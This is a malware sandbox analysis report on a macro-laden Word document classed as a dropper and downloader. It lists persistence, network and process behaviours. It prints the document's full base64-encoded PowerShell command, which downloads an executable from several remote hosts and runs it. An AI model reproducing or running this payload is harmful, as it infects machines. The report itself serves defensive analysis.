e6ba4bd1...43c9 | VTI
Try VMRay Analyzer
VTI SCORE: 98/100
Dynamic Analysis Report
Classification: Dropper, Downloader

e6ba4bd149bfa84ab57c7926c7635e162e459d0e9e419bb3c8d8af8e41c043c9 (SHA256)

sample.doc

Word Document

Created at 2019-02-21 17:24:00

Notifications (1/1)

The operating system was rebooted during the analysis.

Severity Category Operation Classification
4/5
Process Creates process -
  • Creates process "powersheLl -e JAB3ADcANgA2ADQAMgA4AD0AKAAnAFYAOAAnACsAJwBfADIAJwArACcANAA1ACcAKQA7ACQAUgAwAF8AXwAyADIANgAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAMAAzAF8AMAA2ADUAXwA9ACgAJwBoAHQAdABwADoALwAnACsAJwAvAG4AZQB1AG0AYQB0AGkAJwArACcAYwBvACcAKwAnAHMAdQAnACsAJwB0AGkAbABpAHoAYQBkACcAKwAnAG8AJwArACcAcwAuACcAKwAnAGMAbwBtAC8AMQBUACcAKwAnAEkAOAAxACcAKwAnAFAAUgBRAEwATwBSAFIAQAAnACsAJwBoAHQAdAAnACsAJwBwADoALwAvAHcAaAAnACsAJwBpAHMAawB5AHMAaABpAHAAcAAnACsAJwBlAHIALgBjAG8AbQAvAHcAcAAnACsAJwAtACcAKwAnAGMAbwBuAHQAZQBuAHQALwAnACsAJwBBADgAQgBSACcAKwAnAFMAOQAnACsAJwBzAEwAJwArACcAbAA4ACcAKwAnAGkAXwBQADgARAAnACsAJwBCAHMATABoAG8AQABoAHQAdABwACcAKwAnADoALwAvACcAKwAnAGcAZQBlACcAKwAnAHMAdABkACcAKwAnAHIAJwArACcAaQBmAHQAbgB1AC4AYwAnACsAJwBvAG0ALwBnAHEAWAAnACsAJwBiADMAZwAnACsAJwBoAGsAJwArACcAUgBaAEoANgB0ACcAKwAnAGoATAA4AF8AWQBAAGgAdAB0ACcAKwAnAHAAJwArACcAOgAvAC8AbQAnACsAJwBhAHQAJwArACcAZQB4AC4AJwArACcAYgBpAHoALwAvAFIAJwArACcAUQBSADAAJwArACcAUgBhAG8AaABpAFIAXwBQAEAAaAB0AHQAJwArACcAcAA6ACcAKwAnAC8ALwBiACcAKwAnAGUAZQBwACcAKwAnAG0AJwArACcAZQAnACsAJwAuAGUAdQAvAE8AdAAnACsAJwB3AG4AcwBlAHUATQBpAFEAZQB0AGYAQgAnACsAJwBzACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAEEANgBfADAANgA3AD0AKAAnAG4AXwAnACsAJwAyADIAJwArACcAXwBfACcAKQA7ACQAawA5AF8AMwAwADAAXwAwACAAPQAgACgAJwA2ADIAJwArACcAOQAnACkAOwAkAEsANABfADMAMgAzAF8AOQA9ACgAJwBSACcAKwAnAF8ANwA5AF8AXwAnACsAJwA3ACcAKQA7ACQAaQA2ADUANwAzADQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGsAOQBfADMAMAAwAF8AMAArACgAJwAuACcAKwAnAGUAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFEAXwA2ADkANQA1ADEAMwAgAGkAbgAgACQAVgAwADMAXwAwADYANQBfACkAewB0AHIAeQB7ACQAUgAwAF8AXwAyADIANgAxAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFEAXwA2ADkANQA1ADEAMwAsACAAJABpADYANQA3ADMANAApADsAJABpADAAOQAxAF8ANgA4AD0AKAAnAFUAOQAnACsAJwA5AF8AXwA3ACcAKwAnADEAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAaQA2ADUANwAzADQAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABpADYANQA3ADMANAA7ACQAegBfADMAXwAxADYAXwAyAD0AKAAnAFYAMwAnACsAJwAzACcAKwAnADQAMQA0ACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABmADQAXwBfADkAMQA5ADQAPQAoACcAVQAyADEAOQBfACcAKwAnAF8AJwArACcAOABfACcAKQA7AA==".
  • Creates process "C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe".
  • Creates process "C:\Users\aETAdzjz\AppData\Local\zipwcs\ushHer04rO2OqyUQI7w.exe".
4/5
Network Downloads data Downloader
3/5
Network Performs DNS request -
3/5
Persistence Installs system startup script or application -
  • Adds ""C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe"" to Windows startup via registry.
3/5
Network Connects to remote host -
3/5
PE Executes dropped PE file -
2/5
File System Known suspicious file -
  • File "C:\Users\aETAdzjz\Desktop\sample.doc" is a known suspicious file.
2/5
Network Connects to HTTP server -
2/5
PE Drops PE file Dropper
2/5
VBA Macro Executes macro on specific worksheet event -
  • Executes macro automatically on target "auto" and event "open".
1/5
Process Creates system object -
1/5
Static Unparsable sections in file -
  • Static analyzer was unable to completely parse the analyzed file: C:\Users\aETAdzjz\Desktop\sample.doc.
1/5
VBA Macro Contains Office macro -
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image